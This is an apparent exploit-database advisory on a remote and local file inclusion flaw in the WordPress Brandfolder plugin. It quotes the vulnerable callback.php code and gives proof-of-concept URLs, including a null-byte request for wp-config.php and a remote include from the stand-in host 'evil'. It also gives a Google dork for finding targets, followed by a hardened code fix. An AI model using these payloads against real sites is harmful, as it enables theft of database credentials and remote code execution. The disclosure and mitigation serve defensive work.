Vendor: Brandfolder Plugin
By: AMAR^SHG
CVSS: 8.8 (HIGH)
Title: Remote File Inclusion (RFI) & Local File Inclusion (LFI)
CWE: 98
Product Name: Brandfolder Plugin
Affected Version From: <=3.0
Affected Version To: <=3.0
Patch Exists: YES
Related CWE: N/A
CPE: a:brandfolder:brandfolder_plugin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WAMP / Windows
Year: 2016

WordPress brandfolder plugin / RFI & LFI

The vulnerability occurs in the first lines of the file callback.php, where the path passed to require_once is taken directly from the $_REQUEST variable. Depending on the context, an attacker can either host a file called wp-load.php on a malicious server (disabling PHP execution there with an .htaccess so the file is served as source and included remotely), or abuse the null byte character (%00, or %2500 URL-encoded) to truncate the path and include an arbitrary local file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application; in particular, never build an include path from a request parameter.

Exploit-DB raw data:

# Exploit Title: Wordpress brandfolder plugin / RFI & LFI
# Google Dork: inurl:wp-content/plugins/brandfolder
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: https://brandfolder.com
# Software Link: https://wordpress.org/plugins/brandfolder/
# Version: <=3.0
# Tested on: WAMP / Windows

I-Details
The vulnerability occurs at the first lines of the file callback.php:

<?php
  ini_set('display_errors',1);
  ini_set('display_startup_errors',1);
  error_reporting(-1);

  // Vulnerable: the include prefix is taken straight from the request,
  // so the client controls which local or remote file gets loaded.
  require_once($_REQUEST['wp_abspath']  . 'wp-load.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/media.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/file.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/image.php');
  require_once($_REQUEST['wp_abspath']  . 'wp-admin/includes/post.php');

$_REQUEST is based on the user input, so, as you can guess,
depending on the context an attacker can host on a malicious server
a file called wp-load.php and disable its execution using an .htaccess, or
abuse the null byte character (%00, or %2500 URL-encoded).

II-Proof of concept
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=LFI/RFI
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=http://evil/
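As an added example (not the plugin's own code and not part of the original advisory), here is a hardened replacement for the preamble of callback.php shown above. It derives the WordPress root from the plugin file's own location on disk and ignores any client-supplied wp_abspath entirely, which removes both the remote-include and the null-byte-truncation paths. The helper name brandfolder_resolve_wp_root and the directory layout <wp-root>/wp-content/plugins/brandfolder/callback.php are assumptions.

```php
<?php
// Added example, not the Brandfolder plugin's own code.
// Assumed layout: <wp-root>/wp-content/plugins/brandfolder/callback.php

function brandfolder_resolve_wp_root(string $plugin_file): string
{
    // Four dirname() levels from the file: brandfolder/ -> plugins/ -> wp-content/ -> <wp-root>
    $candidate = dirname($plugin_file, 4);

    // realpath() canonicalises the path and returns false if it does not exist,
    // so no "../" sequences or encoded null bytes from outside can influence it.
    $root = realpath($candidate);
    if ($root === false || !is_file($root . DIRECTORY_SEPARATOR . 'wp-load.php')) {
        http_response_code(500);
        exit('WordPress root not found');
    }
    return $root . DIRECTORY_SEPARATOR;
}

// Legitimate callers never need to send wp_abspath, so a request carrying it
// is worth logging as a probe. The value itself is never used.
if (isset($_REQUEST['wp_abspath'])) {
    error_log('brandfolder callback: ignoring client-supplied wp_abspath (possible LFI/RFI probe)');
}

$wp_root = brandfolder_resolve_wp_root(__FILE__);

// Same includes as the original, now anchored to a server-controlled prefix.
require_once $wp_root . 'wp-load.php';
require_once $wp_root . 'wp-admin/includes/media.php';
require_once $wp_root . 'wp-admin/includes/file.php';
require_once $wp_root . 'wp-admin/includes/image.php';
require_once $wp_root . 'wp-admin/includes/post.php';
```

As defence in depth, keep allow_url_include=Off in php.ini (its default), which blocks require_once from fetching http:// URLs even if a future code path reintroduces a request-derived prefix; it does nothing against the local-file variant, which is why the prefix must not come from the request at all.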

Discovered by AMAR^SHG (aka kuroi'sh).
Greetings to RxR & Nofawkx Al & HolaKo